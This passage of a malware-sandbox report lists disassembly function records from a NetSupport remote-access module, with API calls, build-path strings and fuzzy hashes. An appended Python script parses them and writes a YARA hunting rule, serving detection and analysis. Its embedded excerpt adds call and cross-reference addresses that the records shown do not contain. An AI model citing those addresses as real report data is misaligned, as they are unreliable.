                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2229609774-2830328467
                                                                                      • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                      • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncpy
                                                                                      • String ID: 1000,50$1000,50
                                                                                      • API String ID: 2961919466-2776873633
                                                                                      • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                      • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                      • API String ID: 2400454052-4183089485
                                                                                      • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                      • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
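Two things in the records above are worth pulling out programmatically rather than by eye: the KillTimer and SetEvent wrappers both route their failure path through the same subcall at 11029450 (GetLastError, wsprintfA, MessageBoxA with the caption Client32, then ExitProcess, i.e. a fatal-assert handler), and the build-path strings (e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, ..\ctl32\Refcount.cpp) that identify this build of the ctl32 module. Note that for the SetEvent record the Strings section is empty and the path survives only in the Similarity String ID, so a parser has to read both. The following Python is an added example, not part of the Joe Sandbox report: it parses the report's plain-text function records, groups the subcall chains, and emits a YARA rule from the path strings. The EXCERPT is constructed from the three records on this page with bullets and indentation stripped, and the rule name is a placeholder.

```python
"""Added example: parse Joe Sandbox IDA-plugin function records into
structured form, find subcall chains shared by several functions, and turn
the embedded build-path strings into a YARA rule."""
import re
from collections import defaultdict

# Constructed excerpt: the three records above, bullets/indentation stripped.
EXCERPT = r"""
APIs
KillTimer.USER32(?,?), ref: 1100102B
Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
m_hWnd, xrefs: 11001016
Similarity
API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
APIs
Strings
Similarity
API ID: _strncpy
String ID: 1000,50$1000,50
Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
APIs
SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Similarity
API ID: ErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
"""

# Section labels the report uses; every record starts with its "APIs" section.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<api>\w+)\.(?P<mod>\w+)")
# Drive-letter or relative source paths ending in a C/C++ source or header extension.
PATH_RE = re.compile(r"^(?:[a-zA-Z]:\\|\.\.\\)[^$]+\.(?:h|cpp|c)$", re.IGNORECASE)


def parse_records(text):
    """Return one dict per function record: direct APIs, subcall chains,
    strings (from both the Strings section and the Similarity String ID)
    and the instruction fuzzy hash."""
    records, rec, section = [], None, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "subcalls": defaultdict(list), "strings": set(), "fuzzy": None}
            records.append(rec)
            section = "APIs"
            continue
        if line in SECTIONS:
            section = line
            continue
        if rec is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                name = f"{m['api']}.{m['mod']}"
                (rec["subcalls"][m["sub"]] if m["sub"] else rec["apis"]).append(name)
        elif section == "Strings":
            rec["strings"].add(line.split(", xrefs:")[0])
        elif section == "Similarity":
            if line.startswith("String ID: "):
                rec["strings"].update(line[len("String ID: "):].split("$"))
            elif line.startswith("Instruction Fuzzy Hash: "):
                rec["fuzzy"] = line.split(": ", 1)[1]
    return records


def shared_subcall_chains(records):
    """Map subcall address -> {'chain': ordered API list, 'callers': record count}."""
    seen = {}
    for rec in records:
        for addr, chain in rec["subcalls"].items():
            entry = seen.setdefault(addr, {"chain": list(chain), "callers": 0})
            entry["callers"] += 1
    return seen


def build_path_strings(records):
    """Sorted source-path strings (compiler residue) usable as build identifiers."""
    return sorted({s for rec in records for s in rec["strings"] if PATH_RE.match(s)})


def yara_rule(name, paths):
    """Emit a minimal YARA rule; backslashes are doubled for YARA text strings."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, p in enumerate(paths):
        esc = p.replace("\\", "\\\\")
        lines.append(f'        $p{i} = "{esc}" ascii')
    lines += ["    condition:", "        uint16(0) == 0x5A4D and any of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    recs = parse_records(EXCERPT)
    for addr, info in shared_subcall_chains(recs).items():
        print(f"subcall {addr} used by {info['callers']} records: {' -> '.join(info['chain'])}")
    print(yara_rule("netsupport_ctl32_build_paths", build_path_strings(recs)))
```

The rule matches only on strings, so treat it as a hunting aid for this build of the module, not as a detection for NetSupport in general; the fuzzy hashes are kept on each record so you can correlate functions across other reports of the same family.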